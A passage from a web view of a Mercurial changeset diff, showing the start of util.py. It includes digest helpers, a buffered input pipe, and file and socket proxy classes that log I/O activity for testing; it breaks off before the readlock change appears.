##// END OF EJS Templates
util: use a context manager in readlock()
Matt Harbison -
r39941:4017968f default
parent child Browse files
Show More
@@ -1,3989 +1,3987 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from .thirdparty import (
40 40 attr,
41 41 )
42 42 from hgdemandimport import tracing
43 43 from . import (
44 44 encoding,
45 45 error,
46 46 i18n,
47 47 node as nodemod,
48 48 policy,
49 49 pycompat,
50 50 urllibcompat,
51 51 )
52 52 from .utils import (
53 53 procutil,
54 54 stringutil,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 httplib = pycompat.httplib
66 66 pickle = pycompat.pickle
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 readlink = platform.readlink
116 116 rename = platform.rename
117 117 removedirs = platform.removedirs
118 118 samedevice = platform.samedevice
119 119 samefile = platform.samefile
120 120 samestat = platform.samestat
121 121 setflags = platform.setflags
122 122 split = platform.split
123 123 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
124 124 statisexec = platform.statisexec
125 125 statislink = platform.statislink
126 126 umask = platform.umask
127 127 unlink = platform.unlink
128 128 username = platform.username
129 129
130 130 try:
131 131 recvfds = osutil.recvfds
132 132 except AttributeError:
133 133 pass
134 134
135 135 # Python compatibility
136 136
137 137 _notset = object()
138 138
139 139 def bitsfrom(container):
140 140 bits = 0
141 141 for bit in container:
142 142 bits |= bit
143 143 return bits
144 144
145 145 # python 2.6 still have deprecation warning enabled by default. We do not want
146 146 # to display anything to standard user so detect if we are running test and
147 147 # only use python deprecation warning in this case.
148 148 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
149 149 if _dowarn:
150 150 # explicitly unfilter our warning for python 2.7
151 151 #
152 152 # The option of setting PYTHONWARNINGS in the test runner was investigated.
153 153 # However, module name set through PYTHONWARNINGS was exactly matched, so
154 154 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
155 155 # makes the whole PYTHONWARNINGS thing useless for our usecase.
156 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
157 157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
158 158 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
159 159 if _dowarn and pycompat.ispy3:
160 160 # silence warning emitted by passing user string to re.sub()
161 161 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
162 162 r'mercurial')
163 163 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
164 164 DeprecationWarning, r'mercurial')
165 165 # TODO: reinvent imp.is_frozen()
166 166 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
167 167 DeprecationWarning, r'mercurial')
168 168
169 169 def nouideprecwarn(msg, version, stacklevel=1):
170 170 """Issue an python native deprecation warning
171 171
172 172 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
173 173 """
174 174 if _dowarn:
175 175 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
176 176 " update your code.)") % version
177 177 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
178 178
179 179 DIGESTS = {
180 180 'md5': hashlib.md5,
181 181 'sha1': hashlib.sha1,
182 182 'sha512': hashlib.sha512,
183 183 }
184 184 # List of digest types from strongest to weakest
185 185 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
186 186
187 187 for k in DIGESTS_BY_STRENGTH:
188 188 assert k in DIGESTS
189 189
190 190 class digester(object):
191 191 """helper to compute digests.
192 192
193 193 This helper can be used to compute one or more digests given their name.
194 194
195 195 >>> d = digester([b'md5', b'sha1'])
196 196 >>> d.update(b'foo')
197 197 >>> [k for k in sorted(d)]
198 198 ['md5', 'sha1']
199 199 >>> d[b'md5']
200 200 'acbd18db4cc2f85cedef654fccc4a4d8'
201 201 >>> d[b'sha1']
202 202 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
203 203 >>> digester.preferred([b'md5', b'sha1'])
204 204 'sha1'
205 205 """
206 206
207 207 def __init__(self, digests, s=''):
208 208 self._hashes = {}
209 209 for k in digests:
210 210 if k not in DIGESTS:
211 211 raise error.Abort(_('unknown digest type: %s') % k)
212 212 self._hashes[k] = DIGESTS[k]()
213 213 if s:
214 214 self.update(s)
215 215
216 216 def update(self, data):
217 217 for h in self._hashes.values():
218 218 h.update(data)
219 219
220 220 def __getitem__(self, key):
221 221 if key not in DIGESTS:
222 222 raise error.Abort(_('unknown digest type: %s') % k)
223 223 return nodemod.hex(self._hashes[key].digest())
224 224
225 225 def __iter__(self):
226 226 return iter(self._hashes)
227 227
228 228 @staticmethod
229 229 def preferred(supported):
230 230 """returns the strongest digest type in both supported and DIGESTS."""
231 231
232 232 for k in DIGESTS_BY_STRENGTH:
233 233 if k in supported:
234 234 return k
235 235 return None
236 236
237 237 class digestchecker(object):
238 238 """file handle wrapper that additionally checks content against a given
239 239 size and digests.
240 240
241 241 d = digestchecker(fh, size, {'md5': '...'})
242 242
243 243 When multiple digests are given, all of them are validated.
244 244 """
245 245
246 246 def __init__(self, fh, size, digests):
247 247 self._fh = fh
248 248 self._size = size
249 249 self._got = 0
250 250 self._digests = dict(digests)
251 251 self._digester = digester(self._digests.keys())
252 252
253 253 def read(self, length=-1):
254 254 content = self._fh.read(length)
255 255 self._digester.update(content)
256 256 self._got += len(content)
257 257 return content
258 258
259 259 def validate(self):
260 260 if self._size != self._got:
261 261 raise error.Abort(_('size mismatch: expected %d, got %d') %
262 262 (self._size, self._got))
263 263 for k, v in self._digests.items():
264 264 if v != self._digester[k]:
265 265 # i18n: first parameter is a digest name
266 266 raise error.Abort(_('%s mismatch: expected %s, got %s') %
267 267 (k, v, self._digester[k]))
268 268
269 269 try:
270 270 buffer = buffer
271 271 except NameError:
272 272 def buffer(sliceable, offset=0, length=None):
273 273 if length is not None:
274 274 return memoryview(sliceable)[offset:offset + length]
275 275 return memoryview(sliceable)[offset:]
276 276
277 277 _chunksize = 4096
278 278
279 279 class bufferedinputpipe(object):
280 280 """a manually buffered input pipe
281 281
282 282 Python will not let us use buffered IO and lazy reading with 'polling' at
283 283 the same time. We cannot probe the buffer state and select will not detect
284 284 that data are ready to read if they are already buffered.
285 285
286 286 This class let us work around that by implementing its own buffering
287 287 (allowing efficient readline) while offering a way to know if the buffer is
288 288 empty from the output (allowing collaboration of the buffer with polling).
289 289
290 290 This class lives in the 'util' module because it makes use of the 'os'
291 291 module from the python stdlib.
292 292 """
293 293 def __new__(cls, fh):
294 294 # If we receive a fileobjectproxy, we need to use a variation of this
295 295 # class that notifies observers about activity.
296 296 if isinstance(fh, fileobjectproxy):
297 297 cls = observedbufferedinputpipe
298 298
299 299 return super(bufferedinputpipe, cls).__new__(cls)
300 300
301 301 def __init__(self, input):
302 302 self._input = input
303 303 self._buffer = []
304 304 self._eof = False
305 305 self._lenbuf = 0
306 306
307 307 @property
308 308 def hasbuffer(self):
309 309 """True is any data is currently buffered
310 310
311 311 This will be used externally a pre-step for polling IO. If there is
312 312 already data then no polling should be set in place."""
313 313 return bool(self._buffer)
314 314
315 315 @property
316 316 def closed(self):
317 317 return self._input.closed
318 318
319 319 def fileno(self):
320 320 return self._input.fileno()
321 321
322 322 def close(self):
323 323 return self._input.close()
324 324
325 325 def read(self, size):
326 326 while (not self._eof) and (self._lenbuf < size):
327 327 self._fillbuffer()
328 328 return self._frombuffer(size)
329 329
330 330 def unbufferedread(self, size):
331 331 if not self._eof and self._lenbuf == 0:
332 332 self._fillbuffer(max(size, _chunksize))
333 333 return self._frombuffer(min(self._lenbuf, size))
334 334
335 335 def readline(self, *args, **kwargs):
336 336 if 1 < len(self._buffer):
337 337 # this should not happen because both read and readline end with a
338 338 # _frombuffer call that collapse it.
339 339 self._buffer = [''.join(self._buffer)]
340 340 self._lenbuf = len(self._buffer[0])
341 341 lfi = -1
342 342 if self._buffer:
343 343 lfi = self._buffer[-1].find('\n')
344 344 while (not self._eof) and lfi < 0:
345 345 self._fillbuffer()
346 346 if self._buffer:
347 347 lfi = self._buffer[-1].find('\n')
348 348 size = lfi + 1
349 349 if lfi < 0: # end of file
350 350 size = self._lenbuf
351 351 elif 1 < len(self._buffer):
352 352 # we need to take previous chunks into account
353 353 size += self._lenbuf - len(self._buffer[-1])
354 354 return self._frombuffer(size)
355 355
356 356 def _frombuffer(self, size):
357 357 """return at most 'size' data from the buffer
358 358
359 359 The data are removed from the buffer."""
360 360 if size == 0 or not self._buffer:
361 361 return ''
362 362 buf = self._buffer[0]
363 363 if 1 < len(self._buffer):
364 364 buf = ''.join(self._buffer)
365 365
366 366 data = buf[:size]
367 367 buf = buf[len(data):]
368 368 if buf:
369 369 self._buffer = [buf]
370 370 self._lenbuf = len(buf)
371 371 else:
372 372 self._buffer = []
373 373 self._lenbuf = 0
374 374 return data
375 375
376 376 def _fillbuffer(self, size=_chunksize):
377 377 """read data to the buffer"""
378 378 data = os.read(self._input.fileno(), size)
379 379 if not data:
380 380 self._eof = True
381 381 else:
382 382 self._lenbuf += len(data)
383 383 self._buffer.append(data)
384 384
385 385 return data
386 386
387 387 def mmapread(fp):
388 388 try:
389 389 fd = getattr(fp, 'fileno', lambda: fp)()
390 390 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
391 391 except ValueError:
392 392 # Empty files cannot be mmapped, but mmapread should still work. Check
393 393 # if the file is empty, and if so, return an empty buffer.
394 394 if os.fstat(fd).st_size == 0:
395 395 return ''
396 396 raise
397 397
398 398 class fileobjectproxy(object):
399 399 """A proxy around file objects that tells a watcher when events occur.
400 400
401 401 This type is intended to only be used for testing purposes. Think hard
402 402 before using it in important code.
403 403 """
404 404 __slots__ = (
405 405 r'_orig',
406 406 r'_observer',
407 407 )
408 408
409 409 def __init__(self, fh, observer):
410 410 object.__setattr__(self, r'_orig', fh)
411 411 object.__setattr__(self, r'_observer', observer)
412 412
413 413 def __getattribute__(self, name):
414 414 ours = {
415 415 r'_observer',
416 416
417 417 # IOBase
418 418 r'close',
419 419 # closed if a property
420 420 r'fileno',
421 421 r'flush',
422 422 r'isatty',
423 423 r'readable',
424 424 r'readline',
425 425 r'readlines',
426 426 r'seek',
427 427 r'seekable',
428 428 r'tell',
429 429 r'truncate',
430 430 r'writable',
431 431 r'writelines',
432 432 # RawIOBase
433 433 r'read',
434 434 r'readall',
435 435 r'readinto',
436 436 r'write',
437 437 # BufferedIOBase
438 438 # raw is a property
439 439 r'detach',
440 440 # read defined above
441 441 r'read1',
442 442 # readinto defined above
443 443 # write defined above
444 444 }
445 445
446 446 # We only observe some methods.
447 447 if name in ours:
448 448 return object.__getattribute__(self, name)
449 449
450 450 return getattr(object.__getattribute__(self, r'_orig'), name)
451 451
452 452 def __nonzero__(self):
453 453 return bool(object.__getattribute__(self, r'_orig'))
454 454
455 455 __bool__ = __nonzero__
456 456
457 457 def __delattr__(self, name):
458 458 return delattr(object.__getattribute__(self, r'_orig'), name)
459 459
460 460 def __setattr__(self, name, value):
461 461 return setattr(object.__getattribute__(self, r'_orig'), name, value)
462 462
463 463 def __iter__(self):
464 464 return object.__getattribute__(self, r'_orig').__iter__()
465 465
466 466 def _observedcall(self, name, *args, **kwargs):
467 467 # Call the original object.
468 468 orig = object.__getattribute__(self, r'_orig')
469 469 res = getattr(orig, name)(*args, **kwargs)
470 470
471 471 # Call a method on the observer of the same name with arguments
472 472 # so it can react, log, etc.
473 473 observer = object.__getattribute__(self, r'_observer')
474 474 fn = getattr(observer, name, None)
475 475 if fn:
476 476 fn(res, *args, **kwargs)
477 477
478 478 return res
479 479
480 480 def close(self, *args, **kwargs):
481 481 return object.__getattribute__(self, r'_observedcall')(
482 482 r'close', *args, **kwargs)
483 483
484 484 def fileno(self, *args, **kwargs):
485 485 return object.__getattribute__(self, r'_observedcall')(
486 486 r'fileno', *args, **kwargs)
487 487
488 488 def flush(self, *args, **kwargs):
489 489 return object.__getattribute__(self, r'_observedcall')(
490 490 r'flush', *args, **kwargs)
491 491
492 492 def isatty(self, *args, **kwargs):
493 493 return object.__getattribute__(self, r'_observedcall')(
494 494 r'isatty', *args, **kwargs)
495 495
496 496 def readable(self, *args, **kwargs):
497 497 return object.__getattribute__(self, r'_observedcall')(
498 498 r'readable', *args, **kwargs)
499 499
500 500 def readline(self, *args, **kwargs):
501 501 return object.__getattribute__(self, r'_observedcall')(
502 502 r'readline', *args, **kwargs)
503 503
504 504 def readlines(self, *args, **kwargs):
505 505 return object.__getattribute__(self, r'_observedcall')(
506 506 r'readlines', *args, **kwargs)
507 507
508 508 def seek(self, *args, **kwargs):
509 509 return object.__getattribute__(self, r'_observedcall')(
510 510 r'seek', *args, **kwargs)
511 511
512 512 def seekable(self, *args, **kwargs):
513 513 return object.__getattribute__(self, r'_observedcall')(
514 514 r'seekable', *args, **kwargs)
515 515
516 516 def tell(self, *args, **kwargs):
517 517 return object.__getattribute__(self, r'_observedcall')(
518 518 r'tell', *args, **kwargs)
519 519
520 520 def truncate(self, *args, **kwargs):
521 521 return object.__getattribute__(self, r'_observedcall')(
522 522 r'truncate', *args, **kwargs)
523 523
524 524 def writable(self, *args, **kwargs):
525 525 return object.__getattribute__(self, r'_observedcall')(
526 526 r'writable', *args, **kwargs)
527 527
528 528 def writelines(self, *args, **kwargs):
529 529 return object.__getattribute__(self, r'_observedcall')(
530 530 r'writelines', *args, **kwargs)
531 531
532 532 def read(self, *args, **kwargs):
533 533 return object.__getattribute__(self, r'_observedcall')(
534 534 r'read', *args, **kwargs)
535 535
536 536 def readall(self, *args, **kwargs):
537 537 return object.__getattribute__(self, r'_observedcall')(
538 538 r'readall', *args, **kwargs)
539 539
540 540 def readinto(self, *args, **kwargs):
541 541 return object.__getattribute__(self, r'_observedcall')(
542 542 r'readinto', *args, **kwargs)
543 543
544 544 def write(self, *args, **kwargs):
545 545 return object.__getattribute__(self, r'_observedcall')(
546 546 r'write', *args, **kwargs)
547 547
548 548 def detach(self, *args, **kwargs):
549 549 return object.__getattribute__(self, r'_observedcall')(
550 550 r'detach', *args, **kwargs)
551 551
552 552 def read1(self, *args, **kwargs):
553 553 return object.__getattribute__(self, r'_observedcall')(
554 554 r'read1', *args, **kwargs)
555 555
556 556 class observedbufferedinputpipe(bufferedinputpipe):
557 557 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
558 558
559 559 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
560 560 bypass ``fileobjectproxy``. Because of this, we need to make
561 561 ``bufferedinputpipe`` aware of these operations.
562 562
563 563 This variation of ``bufferedinputpipe`` can notify observers about
564 564 ``os.read()`` events. It also re-publishes other events, such as
565 565 ``read()`` and ``readline()``.
566 566 """
567 567 def _fillbuffer(self):
568 568 res = super(observedbufferedinputpipe, self)._fillbuffer()
569 569
570 570 fn = getattr(self._input._observer, r'osread', None)
571 571 if fn:
572 572 fn(res, _chunksize)
573 573
574 574 return res
575 575
576 576 # We use different observer methods because the operation isn't
577 577 # performed on the actual file object but on us.
578 578 def read(self, size):
579 579 res = super(observedbufferedinputpipe, self).read(size)
580 580
581 581 fn = getattr(self._input._observer, r'bufferedread', None)
582 582 if fn:
583 583 fn(res, size)
584 584
585 585 return res
586 586
587 587 def readline(self, *args, **kwargs):
588 588 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
589 589
590 590 fn = getattr(self._input._observer, r'bufferedreadline', None)
591 591 if fn:
592 592 fn(res)
593 593
594 594 return res
595 595
596 596 PROXIED_SOCKET_METHODS = {
597 597 r'makefile',
598 598 r'recv',
599 599 r'recvfrom',
600 600 r'recvfrom_into',
601 601 r'recv_into',
602 602 r'send',
603 603 r'sendall',
604 604 r'sendto',
605 605 r'setblocking',
606 606 r'settimeout',
607 607 r'gettimeout',
608 608 r'setsockopt',
609 609 }
610 610
611 611 class socketproxy(object):
612 612 """A proxy around a socket that tells a watcher when events occur.
613 613
614 614 This is like ``fileobjectproxy`` except for sockets.
615 615
616 616 This type is intended to only be used for testing purposes. Think hard
617 617 before using it in important code.
618 618 """
619 619 __slots__ = (
620 620 r'_orig',
621 621 r'_observer',
622 622 )
623 623
624 624 def __init__(self, sock, observer):
625 625 object.__setattr__(self, r'_orig', sock)
626 626 object.__setattr__(self, r'_observer', observer)
627 627
628 628 def __getattribute__(self, name):
629 629 if name in PROXIED_SOCKET_METHODS:
630 630 return object.__getattribute__(self, name)
631 631
632 632 return getattr(object.__getattribute__(self, r'_orig'), name)
633 633
634 634 def __delattr__(self, name):
635 635 return delattr(object.__getattribute__(self, r'_orig'), name)
636 636
637 637 def __setattr__(self, name, value):
638 638 return setattr(object.__getattribute__(self, r'_orig'), name, value)
639 639
640 640 def __nonzero__(self):
641 641 return bool(object.__getattribute__(self, r'_orig'))
642 642
643 643 __bool__ = __nonzero__
644 644
645 645 def _observedcall(self, name, *args, **kwargs):
646 646 # Call the original object.
647 647 orig = object.__getattribute__(self, r'_orig')
648 648 res = getattr(orig, name)(*args, **kwargs)
649 649
650 650 # Call a method on the observer of the same name with arguments
651 651 # so it can react, log, etc.
652 652 observer = object.__getattribute__(self, r'_observer')
653 653 fn = getattr(observer, name, None)
654 654 if fn:
655 655 fn(res, *args, **kwargs)
656 656
657 657 return res
658 658
659 659 def makefile(self, *args, **kwargs):
660 660 res = object.__getattribute__(self, r'_observedcall')(
661 661 r'makefile', *args, **kwargs)
662 662
663 663 # The file object may be used for I/O. So we turn it into a
664 664 # proxy using our observer.
665 665 observer = object.__getattribute__(self, r'_observer')
666 666 return makeloggingfileobject(observer.fh, res, observer.name,
667 667 reads=observer.reads,
668 668 writes=observer.writes,
669 669 logdata=observer.logdata,
670 670 logdataapis=observer.logdataapis)
671 671
672 672 def recv(self, *args, **kwargs):
673 673 return object.__getattribute__(self, r'_observedcall')(
674 674 r'recv', *args, **kwargs)
675 675
676 676 def recvfrom(self, *args, **kwargs):
677 677 return object.__getattribute__(self, r'_observedcall')(
678 678 r'recvfrom', *args, **kwargs)
679 679
680 680 def recvfrom_into(self, *args, **kwargs):
681 681 return object.__getattribute__(self, r'_observedcall')(
682 682 r'recvfrom_into', *args, **kwargs)
683 683
684 684 def recv_into(self, *args, **kwargs):
685 685 return object.__getattribute__(self, r'_observedcall')(
686 686 r'recv_info', *args, **kwargs)
687 687
688 688 def send(self, *args, **kwargs):
689 689 return object.__getattribute__(self, r'_observedcall')(
690 690 r'send', *args, **kwargs)
691 691
692 692 def sendall(self, *args, **kwargs):
693 693 return object.__getattribute__(self, r'_observedcall')(
694 694 r'sendall', *args, **kwargs)
695 695
696 696 def sendto(self, *args, **kwargs):
697 697 return object.__getattribute__(self, r'_observedcall')(
698 698 r'sendto', *args, **kwargs)
699 699
700 700 def setblocking(self, *args, **kwargs):
701 701 return object.__getattribute__(self, r'_observedcall')(
702 702 r'setblocking', *args, **kwargs)
703 703
704 704 def settimeout(self, *args, **kwargs):
705 705 return object.__getattribute__(self, r'_observedcall')(
706 706 r'settimeout', *args, **kwargs)
707 707
708 708 def gettimeout(self, *args, **kwargs):
709 709 return object.__getattribute__(self, r'_observedcall')(
710 710 r'gettimeout', *args, **kwargs)
711 711
712 712 def setsockopt(self, *args, **kwargs):
713 713 return object.__getattribute__(self, r'_observedcall')(
714 714 r'setsockopt', *args, **kwargs)
715 715
716 716 class baseproxyobserver(object):
717 717 def _writedata(self, data):
718 718 if not self.logdata:
719 719 if self.logdataapis:
720 720 self.fh.write('\n')
721 721 self.fh.flush()
722 722 return
723 723
724 724 # Simple case writes all data on a single line.
725 725 if b'\n' not in data:
726 726 if self.logdataapis:
727 727 self.fh.write(': %s\n' % stringutil.escapestr(data))
728 728 else:
729 729 self.fh.write('%s> %s\n'
730 730 % (self.name, stringutil.escapestr(data)))
731 731 self.fh.flush()
732 732 return
733 733
734 734 # Data with newlines is written to multiple lines.
735 735 if self.logdataapis:
736 736 self.fh.write(':\n')
737 737
738 738 lines = data.splitlines(True)
739 739 for line in lines:
740 740 self.fh.write('%s> %s\n'
741 741 % (self.name, stringutil.escapestr(line)))
742 742 self.fh.flush()
743 743
744 744 class fileobjectobserver(baseproxyobserver):
745 745 """Logs file object activity."""
746 746 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
747 747 logdataapis=True):
748 748 self.fh = fh
749 749 self.name = name
750 750 self.logdata = logdata
751 751 self.logdataapis = logdataapis
752 752 self.reads = reads
753 753 self.writes = writes
754 754
755 755 def read(self, res, size=-1):
756 756 if not self.reads:
757 757 return
758 758 # Python 3 can return None from reads at EOF instead of empty strings.
759 759 if res is None:
760 760 res = ''
761 761
762 762 if size == -1 and res == '':
763 763 # Suppress pointless read(-1) calls that return
764 764 # nothing. These happen _a lot_ on Python 3, and there
765 765 # doesn't seem to be a better workaround to have matching
766 766 # Python 2 and 3 behavior. :(
767 767 return
768 768
769 769 if self.logdataapis:
770 770 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
771 771
772 772 self._writedata(res)
773 773
774 774 def readline(self, res, limit=-1):
775 775 if not self.reads:
776 776 return
777 777
778 778 if self.logdataapis:
779 779 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
780 780
781 781 self._writedata(res)
782 782
783 783 def readinto(self, res, dest):
784 784 if not self.reads:
785 785 return
786 786
787 787 if self.logdataapis:
788 788 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
789 789 res))
790 790
791 791 data = dest[0:res] if res is not None else b''
792 792 self._writedata(data)
793 793
794 794 def write(self, res, data):
795 795 if not self.writes:
796 796 return
797 797
798 798 # Python 2 returns None from some write() calls. Python 3 (reasonably)
799 799 # returns the integer bytes written.
800 800 if res is None and data:
801 801 res = len(data)
802 802
803 803 if self.logdataapis:
804 804 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
805 805
806 806 self._writedata(data)
807 807
808 808 def flush(self, res):
809 809 if not self.writes:
810 810 return
811 811
812 812 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
813 813
814 814 # For observedbufferedinputpipe.
815 815 def bufferedread(self, res, size):
816 816 if not self.reads:
817 817 return
818 818
819 819 if self.logdataapis:
820 820 self.fh.write('%s> bufferedread(%d) -> %d' % (
821 821 self.name, size, len(res)))
822 822
823 823 self._writedata(res)
824 824
825 825 def bufferedreadline(self, res):
826 826 if not self.reads:
827 827 return
828 828
829 829 if self.logdataapis:
830 830 self.fh.write('%s> bufferedreadline() -> %d' % (
831 831 self.name, len(res)))
832 832
833 833 self._writedata(res)
834 834
835 835 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
836 836 logdata=False, logdataapis=True):
837 837 """Turn a file object into a logging file object."""
838 838
839 839 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
840 840 logdata=logdata, logdataapis=logdataapis)
841 841 return fileobjectproxy(fh, observer)
842 842
843 843 class socketobserver(baseproxyobserver):
844 844 """Logs socket activity."""
845 845 def __init__(self, fh, name, reads=True, writes=True, states=True,
846 846 logdata=False, logdataapis=True):
847 847 self.fh = fh
848 848 self.name = name
849 849 self.reads = reads
850 850 self.writes = writes
851 851 self.states = states
852 852 self.logdata = logdata
853 853 self.logdataapis = logdataapis
854 854
855 855 def makefile(self, res, mode=None, bufsize=None):
856 856 if not self.states:
857 857 return
858 858
859 859 self.fh.write('%s> makefile(%r, %r)\n' % (
860 860 self.name, mode, bufsize))
861 861
862 862 def recv(self, res, size, flags=0):
863 863 if not self.reads:
864 864 return
865 865
866 866 if self.logdataapis:
867 867 self.fh.write('%s> recv(%d, %d) -> %d' % (
868 868 self.name, size, flags, len(res)))
869 869 self._writedata(res)
870 870
871 871 def recvfrom(self, res, size, flags=0):
872 872 if not self.reads:
873 873 return
874 874
875 875 if self.logdataapis:
876 876 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
877 877 self.name, size, flags, len(res[0])))
878 878
879 879 self._writedata(res[0])
880 880
881 881 def recvfrom_into(self, res, buf, size, flags=0):
882 882 if not self.reads:
883 883 return
884 884
885 885 if self.logdataapis:
886 886 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
887 887 self.name, size, flags, res[0]))
888 888
889 889 self._writedata(buf[0:res[0]])
890 890
891 891 def recv_into(self, res, buf, size=0, flags=0):
892 892 if not self.reads:
893 893 return
894 894
895 895 if self.logdataapis:
896 896 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
897 897 self.name, size, flags, res))
898 898
899 899 self._writedata(buf[0:res])
900 900
901 901 def send(self, res, data, flags=0):
902 902 if not self.writes:
903 903 return
904 904
905 905 self.fh.write('%s> send(%d, %d) -> %d' % (
906 906 self.name, len(data), flags, len(res)))
907 907 self._writedata(data)
908 908
909 909 def sendall(self, res, data, flags=0):
910 910 if not self.writes:
911 911 return
912 912
913 913 if self.logdataapis:
914 914 # Returns None on success. So don't bother reporting return value.
915 915 self.fh.write('%s> sendall(%d, %d)' % (
916 916 self.name, len(data), flags))
917 917
918 918 self._writedata(data)
919 919
920 920 def sendto(self, res, data, flagsoraddress, address=None):
921 921 if not self.writes:
922 922 return
923 923
924 924 if address:
925 925 flags = flagsoraddress
926 926 else:
927 927 flags = 0
928 928
929 929 if self.logdataapis:
930 930 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
931 931 self.name, len(data), flags, address, res))
932 932
933 933 self._writedata(data)
934 934
935 935 def setblocking(self, res, flag):
936 936 if not self.states:
937 937 return
938 938
939 939 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
940 940
941 941 def settimeout(self, res, value):
942 942 if not self.states:
943 943 return
944 944
945 945 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
946 946
947 947 def gettimeout(self, res):
948 948 if not self.states:
949 949 return
950 950
951 951 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
952 952
953 953 def setsockopt(self, res, level, optname, value):
954 954 if not self.states:
955 955 return
956 956
957 957 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
958 958 self.name, level, optname, value, res))
959 959
960 960 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
961 961 logdata=False, logdataapis=True):
962 962 """Turn a socket into a logging socket."""
963 963
964 964 observer = socketobserver(logh, name, reads=reads, writes=writes,
965 965 states=states, logdata=logdata,
966 966 logdataapis=logdataapis)
967 967 return socketproxy(fh, observer)
968 968
969 969 def version():
970 970 """Return version information if available."""
971 971 try:
972 972 from . import __version__
973 973 return __version__.version
974 974 except ImportError:
975 975 return 'unknown'
976 976
977 977 def versiontuple(v=None, n=4):
978 978 """Parses a Mercurial version string into an N-tuple.
979 979
980 980 The version string to be parsed is specified with the ``v`` argument.
981 981 If it isn't defined, the current Mercurial version string will be parsed.
982 982
983 983 ``n`` can be 2, 3, or 4. Here is how some version strings map to
984 984 returned values:
985 985
986 986 >>> v = b'3.6.1+190-df9b73d2d444'
987 987 >>> versiontuple(v, 2)
988 988 (3, 6)
989 989 >>> versiontuple(v, 3)
990 990 (3, 6, 1)
991 991 >>> versiontuple(v, 4)
992 992 (3, 6, 1, '190-df9b73d2d444')
993 993
994 994 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
995 995 (3, 6, 1, '190-df9b73d2d444+20151118')
996 996
997 997 >>> v = b'3.6'
998 998 >>> versiontuple(v, 2)
